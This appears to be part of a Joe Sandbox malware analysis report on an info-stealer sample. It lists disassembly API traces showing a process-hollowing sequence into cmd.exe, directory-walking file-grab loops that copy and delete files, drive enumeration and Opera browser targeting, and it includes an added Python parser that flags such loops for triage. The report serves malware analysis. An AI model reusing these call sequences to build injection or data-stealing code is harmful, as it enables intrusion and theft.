• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: _memset$Desktoplstrcat$Create$CloseOpenProcessSleeplstrcpywsprintf
• String ID: ChromeBuildTools$D
• API String ID: 3792893142-3322131035
• Opcode ID: e4aa9b4ce5cb369250996e49f2ec35427c67acbb55db88c880451dbdb753832a
• Instruction ID: ae277cfad0941f1fd2b91412b268f222774b8d585f3e3651b7e02acc35d6a735
• Opcode Fuzzy Hash: e4aa9b4ce5cb369250996e49f2ec35427c67acbb55db88c880451dbdb753832a
• Instruction Fuzzy Hash: B05121B290021DAFDB22DFA4DC89EDA77BCBB18304F400495B609E6151EB759F859F60
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: /$UT
                                                                                                                                                                                                                                                          • API String ID: 0-1626504983
                                                                                                                                                                                                                                                          • Opcode ID: 61401cfe4a98bb36a07a4f03108eff2fdb378ec68a6c1d80551b9732ccda44ac
                                                                                                                                                                                                                                                          • Instruction ID: 9463dde5de3c1625c73f698d50cda1f04685505c6dd2f4b5634b1adde0c3548c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61401cfe4a98bb36a07a4f03108eff2fdb378ec68a6c1d80551b9732ccda44ac
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16029EB1D0026C8BDF21CF64CD807AEBBB5AF45310F1840E9DA48AB256D7349E84EF95
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FEF872
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,010155BD,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,?), ref: 00FEF896
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00FEF8A8
                                                                                                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00FEF8BA
                                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FEF8D8
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00FEF8EE
                                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 00FEF8FE
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,00000000,00FF2F30,?,00000000), ref: 00FEF91D
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00FEF953
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,D798E8F4,00000004,00000000), ref: 00FEF97A
                                                                                                                                                                                                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00FEF98C
                                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 00FEF995
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                                                                                                                                                                          • String ID: ($C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          • API String ID: 3621800378-4087486346
                                                                                                                                                                                                                                                          • Opcode ID: 941cac70ef4b5464ec263cbcf71bba089a8c719e1330514eaa38da741808bc74
                                                                                                                                                                                                                                                          • Instruction ID: 791cff35450fe79cae7f8ecaf9ac3785e58dbed3eff3f80087a679294234e1fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 941cac70ef4b5464ec263cbcf71bba089a8c719e1330514eaa38da741808bc74
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96412672A00208AFEB21DFA5DC85FAEB7B9FB48704F004464FA45EA161D375A954DB21
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,01019A50,01019A54,01015A0F,01015A0E,00FF77E1,?,00000000), ref: 00FE1F94
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01019A58), ref: 00FE1FC7
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01019A5C), ref: 00FE1FE1
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,01019A60,01019A64,?,01019A68,01015A12), ref: 00FE20CD
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FE22B3
  • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
• DeleteFileA.KERNEL32(?), ref: 00FE2326
• FindNextFileA.KERNEL32(?,?), ref: 00FE2392
• FindClose.KERNEL32(?), ref: 00FE23A6
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FE25CC
  • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
  • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
  • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
  • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
  • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
• DeleteFileA.KERNEL32(?), ref: 00FE263F
  • Part of subcall function 00FF7074: Sleep.KERNEL32(000003E8,?,?), ref: 00FF70DB
• FindNextFileA.KERNEL32(?,?), ref: 00FE26B6
• FindClose.KERNEL32(?), ref: 00FE26CA
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
  • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF1FB5: GetFileAttributesA.KERNEL32(?,?,?,00FEDC33,?,?,?), ref: 00FF1FBC
  • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
• String ID: \*.*
• API String ID: 1475085387-1173974218
• Opcode ID: 05ce9b4c9c81963e2c09c6a4b3d48b6f8b3419d138316b73f08259d1e16ac0f8
• Instruction ID: 224e4487545fd5c59dff81b1e04a96f3760a5bbd1f5985f293393414681131aa
• Opcode Fuzzy Hash: 05ce9b4c9c81963e2c09c6a4b3d48b6f8b3419d138316b73f08259d1e16ac0f8
• Instruction Fuzzy Hash: F532967290116D9BCF60FB26DD46ADDB378AF00304F4155E1BA4877122DBB9AF85AF80
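The two API listings in this section, taken together, show the shape of a stealer's file-grabber loop: a directory walk (FindFirstFileA with the `\*.*` string, FindNextFileA, FindClose), a shared read-whole-file helper at 00FE85FA (CreateFileA, GetFileSizeEx, LocalAlloc, ReadFile, CloseHandle), CopyFileA, and DeleteFileA on the same paths. The following Python is an added example, not Joe Sandbox's or the sample's code: it parses the IDA-plugin API annotation format, groups calls per function record, and labels that pattern. The sample input is constructed from lines on this page (with an `APIs` header re-added for the first record, whose header sits above this excerpt); the behaviour labels are this example's own heuristic, not report fields.

```python
"""Parse Joe Sandbox IDA-plugin 'APIs' listings and flag file-grab loops.

Added example for this report, not Joe Sandbox code. It turns the textual
API annotations into per-function records so the enumerate -> read/copy ->
delete -> next-file shape is visible at a glance.
"""
import re
from collections import defaultdict

# Constructed sample: lines copied from the two function records in this
# report section. The first record's "APIs" header sits above the excerpt on
# the page, so it is re-added here to delimit the records.
SAMPLE = """\
APIs
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FE22B3
  • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
• DeleteFileA.KERNEL32(?), ref: 00FE2326
• FindNextFileA.KERNEL32(?,?), ref: 00FE2392
• FindClose.KERNEL32(?), ref: 00FE23A6
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FE25CC
  • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
  • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
• DeleteFileA.KERNEL32(?), ref: 00FE263F
• FindNextFileA.KERNEL32(?,?), ref: 00FE26B6
• FindClose.KERNEL32(?), ref: 00FE26CA
APIs
• wsprintfA.USER32 ref: 00FF5647
• FindFirstFileA.KERNEL32(?,?), ref: 00FF565E
• StrCmpCA.SHLWAPI(?,01015A68), ref: 00FF567F
• StrCmpCA.SHLWAPI(?,01015A6C), ref: 00FF5699
• lstrcatA.KERNEL32(?,01015A70), ref: 00FF5736
  • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
• FindNextFileA.KERNEL32(?,?), ref: 00FF5800
• FindClose.KERNEL32(?), ref: 00FF5814
"""

CALL_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"          # e.g. CopyFileA.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"            # argument list; absent for wsprintfA
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


def parse_records(text):
    """Split the listing into function records, one per 'APIs' header.

    Each record is a list of dicts with api, module, args (list), ref (the
    call site) and sub (the callee address when the line is a 'Part of
    subcall function' entry, else None)."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = CALL_RE.match(line)
        if not m or current is None:
            continue
        args = m.group("args")
        current.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args.split(",") if args else [],
            "ref": m.group("ref"),
            "sub": m.group("sub"),
        })
    return records


# Heuristic labels for this example; they are not Joe Sandbox signature names.
ENUMERATE = {"FindFirstFileA", "FindNextFileA", "FindFirstFileW", "FindNextFileW"}
COLLECT = {"ReadFile", "CopyFileA", "CopyFileW"}
CLEANUP = {"DeleteFileA", "DeleteFileW"}


def classify(record):
    """Return the behaviours visible in one record.

    A directory walk that reads or copies each entry is the shape of a
    stealer's file-grabber loop; DeleteFileA alongside it shows the function
    removes files after use."""
    apis = {c["api"] for c in record}
    found = set()
    if apis & ENUMERATE:
        found.add("enumerates_directory")
    if apis & COLLECT:
        found.add("reads_or_copies_files")
    if apis & CLEANUP:
        found.add("deletes_files")
    if {"enumerates_directory", "reads_or_copies_files"} <= found:
        found.add("file_grab_loop")
    return found


def inherited_calls(record):
    """Map subcall address -> APIs reached through it, which exposes shared
    helpers such as the read-whole-file routine at 00FE85FA."""
    out = defaultdict(set)
    for c in record:
        if c["sub"]:
            out[c["sub"]].add(c["api"])
    return dict(out)


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(f"record {i}: {sorted(classify(rec))}")
        for sub, apis in inherited_calls(rec).items():
            print(f"  via {sub}: {sorted(apis)}")
```

Run it on the full "APIs" sections of a report to get one line per function; the functions that light up with `file_grab_loop` are the ones worth opening in the disassembly first, and `inherited_calls` shows which callee (here 00FE85FA) actually does the reading, so you only need to reverse that helper once.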
APIs
• wsprintfA.USER32 ref: 00FF5647
• FindFirstFileA.KERNEL32(?,?), ref: 00FF565E
• StrCmpCA.SHLWAPI(?,01015A68), ref: 00FF567F
• StrCmpCA.SHLWAPI(?,01015A6C), ref: 00FF5699
• lstrcatA.KERNEL32(?), ref: 00FF56EA
• lstrcatA.KERNEL32(?), ref: 00FF56FD
• lstrcatA.KERNEL32(?,?), ref: 00FF5711
• lstrcatA.KERNEL32(?,?), ref: 00FF5724
• lstrcatA.KERNEL32(?,01015A70), ref: 00FF5736
• lstrcatA.KERNEL32(?,?), ref: 00FF574A
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
  • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
  • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
  • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
  • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
  • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
  • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
• FindNextFileA.KERNEL32(?,?), ref: 00FF5800
• FindClose.KERNEL32(?), ref: 00FF5814
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
• String ID: %s\%s
• API String ID: 1150833511-4073750446
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
• FindFirstFileA.KERNEL32(?,?,\*.*,0101584E,00FECDF2,?,?), ref: 00FEC0FF
• StrCmpCA.SHLWAPI(?,010164A4), ref: 00FEC11F
• StrCmpCA.SHLWAPI(?,010164A8), ref: 00FEC139
• StrCmpCA.SHLWAPI(?,Opera,0101586F,01015867,01015863,0101585B,0101585A,01015857,0101584F), ref: 00FEC1C5
• StrCmpCA.SHLWAPI(?,Opera GX), ref: 00FEC1D3
• StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 00FEC1E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
• String ID: Opera$Opera Crypto$Opera GX$\*.*
• API String ID: 2567437900-1710495004
APIs
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00FF539F
• _memset.LIBCMT ref: 00FF53C2
• GetDriveTypeA.KERNEL32(?), ref: 00FF53CB
• lstrcpyA.KERNEL32(?,?), ref: 00FF53EB
• lstrcpyA.KERNEL32(?,?), ref: 00FF5406
  • Part of subcall function 00FF4EA5: wsprintfA.USER32 ref: 00FF4EF9
  • Part of subcall function 00FF4EA5: FindFirstFileA.KERNEL32(?,?), ref: 00FF4F10
  • Part of subcall function 00FF4EA5: _memset.LIBCMT ref: 00FF4F2C
  • Part of subcall function 00FF4EA5: _memset.LIBCMT ref: 00FF4F3D
  • Part of subcall function 00FF4EA5: StrCmpCA.SHLWAPI(?,010159E0), ref: 00FF4F5E
  • Part of subcall function 00FF4EA5: StrCmpCA.SHLWAPI(?,010159E4), ref: 00FF4F78
  • Part of subcall function 00FF4EA5: wsprintfA.USER32 ref: 00FF4F9F
  • Part of subcall function 00FF4EA5: StrCmpCA.SHLWAPI(?,01015616), ref: 00FF4FB3
  • Part of subcall function 00FF4EA5: wsprintfA.USER32 ref: 00FF4FDC
  • Part of subcall function 00FF4EA5: _memset.LIBCMT ref: 00FF5005
  • Part of subcall function 00FF4EA5: lstrcatA.KERNEL32(?,?), ref: 00FF501A
• lstrcpyA.KERNEL32(?,00000000), ref: 00FF5427
• lstrlenA.KERNEL32(?), ref: 00FF54A1
Strings
Memory Dump Source
